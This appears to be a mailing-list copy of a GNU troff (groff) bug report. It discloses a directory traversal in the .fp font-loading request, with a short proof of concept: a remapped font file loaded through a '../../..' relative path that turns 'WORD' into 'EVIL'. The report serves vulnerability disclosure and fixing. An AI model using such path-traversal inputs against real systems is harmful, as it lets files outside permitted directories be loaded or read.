|
| From: | G. Branden Robinson |
| Subject: | [bug #61424] [libgroff] directory traversal in .fp request |
| Date: | Thu, 4 Nov 2021 05:09:14 -0400 (EDT) |
| User-agent: | Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 |
URL:
<https://savannah.gnu.org/bugs/?61424>
Summary: [libgroff] directory traversal in .fp request
Project: GNU troff
Submitted by: gbranden
Submitted on: Thu 04 Nov 2021 09:09:12 AM UTC
Category: Core
Severity: 4 - Important
Item Group: None
Status: In Progress
Privacy: Public
Assigned to: gbranden
Open/Closed: Open
Discussion Lock: Any
Planned Release: None
_______________________________________________________
Details:
Affects groff 1.22.4 and probably goes back a long way.
Setup:
$ cat ~/bogusfont
charset
W 0 0 69
O 0 0 86
R 0 0 73
D 0 0 76
$ cat EXPERIMENTS/hello-dave.roff
.\" This doesn't work...
.\".fp 5 /home/branden/bogusfont
.\" ...but this does.
.fp 5 ../../../../../../../../../../../home/branden/bogusfont
.ft 5
WORD
.pl \n(nlu
Output:
$ nroff EXPERIMENTS/hello-dave.roff
EVIL
_______________________________________________________
Reply to this item at:
<https://savannah.gnu.org/bugs/?61424>
_______________________________________________
Message sent via Savannah
https://savannah.gnu.org/
| [Prev in Thread] | Current Thread | [Next in Thread] |